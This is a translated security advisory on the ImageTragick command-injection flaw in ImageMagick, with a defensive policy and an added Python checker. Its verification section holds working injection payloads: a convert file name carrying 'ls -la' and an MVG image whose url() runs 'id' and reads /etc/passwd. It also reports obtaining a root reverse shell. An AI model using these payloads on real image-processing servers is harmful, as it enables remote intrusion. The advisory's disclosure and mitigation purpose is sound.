ImageMagick hit by a high-risk command execution vulnerability

0x01 Preface

ImageMagick is a powerful, stable, open-source toolset and development library that can read, write, and process image files in more than 89 basic formats, including the popular TIFF, JPEG, GIF, PNG, PDF, and PHOTOCD formats. Many website platforms use it to render and process images. Unfortunately, on the 3rd a series of vulnerabilities was disclosed, one of which allows remote code execution (RCE) when a user-submitted image is processed. The vulnerability is being exploited in the wild. Many image processing plugins depend on the ImageMagick library, including but not limited to PHP Imagick, Ruby RMagick and Paperclip, and Node.js imagemagick.

The root cause is insufficient filtering of special characters: file names passed to the back end are not sanitised before being handed to a shell command, so during conversions between several file formats an attacker-controlled file name leads to remote command execution.
0x02 Affected Version Range

ImageMagick 6.5.7-8 (2012-08-17): manually tested, vulnerable
ImageMagick 6.7.7-10 (2014-03-06): manually tested, vulnerable
All versions up to and including 6.9.3-9 (released 2016-04-30)
0x03 Vulnerability Verification

1. Command verification

If ImageMagick is installed on the system, run the following command locally:

convert 'https://example.com"|ls "-la' out.png

If ls -la runs successfully, the vulnerability exists. If ls is not executed and an error is reported instead, the installation is unaffected.
2. PoC verification

First build a crafted image file:

vi exp1.jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id && ls -al /etc/passwd")'
pop graphic-context

Running attack PoC 1 produces errors, but both commands are executed successfully, which shows that the flaw is present.
Next, a script that downloads and runs a reverse shell was prepared, and the shell command was executed through the same payload:

It runs successfully; on the listening server you can see:

A reverse shell with root privileges comes back, as shown.
0x04 Remediation

At the time of writing no official patched release is available, so the following two preventive measures are recommended for now:

1. When an image is uploaded, inspect the file content to determine whether the user actually uploaded an image of the claimed type.
2. Use a policy file to disable ImageMagick's risky coders.

For ImageMagick's global policy file under /etc/imagemagick, add the following configuration at the end of policy.xml:
vi /etc/imagemagick/policy.xml

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
With this policy in place, running attack PoC 2 fails: it can neither download the script nor execute the command.
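The two measures above can each be checked mechanically. The following Python script is an added example and is not part of the original post or of ImageMagick itself: it implements measure 1 as a magic-byte check that ignores the file extension (a text MVG file renamed to .jpg is rejected because it carries no raster signature), and it checks measure 2 by parsing a policy.xml and reporting which of the risky coders are not disabled. Note that a real policy.xml already contains a <policymap> element, so the <policy> entries belong inside it rather than as a second policymap; the checker assumes that layout. The sample upload bytes and the two sample policy files are constructed here for illustration.

```python
"""Added example: defensive checks for the two ImageTragick mitigations
(content-based upload validation and policy.xml coder restrictions).
The sample inputs below are constructed for illustration."""
import xml.etree.ElementTree as ET

# Magic-byte signatures for the raster formats an upload endpoint should accept.
# Each entry: (offset, expected bytes, canonical type name)
RASTER_SIGNATURES = [
    (0, b"\xff\xd8\xff", "jpeg"),
    (0, b"\x89PNG\r\n\x1a\n", "png"),
    (0, b"GIF87a", "gif"),
    (0, b"GIF89a", "gif"),
]

# Coders that the policy.xml in the post disables.
RISKY_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def sniff_image_type(data: bytes):
    """Return 'jpeg', 'png' or 'gif' if the bytes start with a known raster
    signature, otherwise None. The file name/extension is deliberately ignored:
    ImageMagick picks the decoder from the content, so the name proves nothing."""
    for offset, magic, name in RASTER_SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return name
    return None


def accept_upload(data: bytes) -> bool:
    """Upload gate: only content that is a recognised raster image is passed
    on to ImageMagick. Text formats (MVG, MSL, SVG) never get this far."""
    return sniff_image_type(data) is not None


def policy_disables(policy_xml: str, coders=RISKY_CODERS):
    """Parse a policy.xml and return the subset of `coders` that it does NOT
    disable. A coder counts as disabled only when a <policy domain="coder"
    rights="none" pattern="..."> entry names it (pattern compared upper-case)."""
    root = ET.fromstring(policy_xml)
    disabled = set()
    for pol in root.iter("policy"):
        if pol.get("domain", "").lower() != "coder":
            continue
        if pol.get("rights", "").lower() != "none":
            continue
        pattern = pol.get("pattern", "").upper()
        if pattern in coders:
            disabled.add(pattern)
    return set(coders) - disabled


# Constructed sample uploads: a minimal JPEG prefix and a harmless text MVG
# file of the kind that the PoC renames to .jpg.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_MVG = (b"push graphic-context\n"
              b"viewbox 0 0 640 480\n"
              b"fill 'url(https://example.com/a.png)'\n"
              b"pop graphic-context\n")

# Constructed sample policies: one without coder restrictions, one with the
# entries from the post placed inside the existing <policymap>.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""


if __name__ == "__main__":
    print("jpeg accepted:", accept_upload(SAMPLE_JPEG))            # True
    print("mvg accepted:", accept_upload(SAMPLE_MVG))              # False
    print("weak policy leaves enabled:", sorted(policy_disables(WEAK_POLICY)))
    print("hardened policy leaves enabled:", sorted(policy_disables(HARDENED_POLICY)))
```

Run the script directly to see the two gates in action; in a real upload handler, `accept_upload` should run before the file is written to disk or handed to any ImageMagick binding, and `policy_disables` can be run against /etc/imagemagick/policy.xml as a deployment check.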
0x05 Reference Sources

https://imagetragick.com/
http://php.net/manual/zh/function.getimagesize.php
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
https://security-tracker.debian.org/tracker/CVE-2016-3714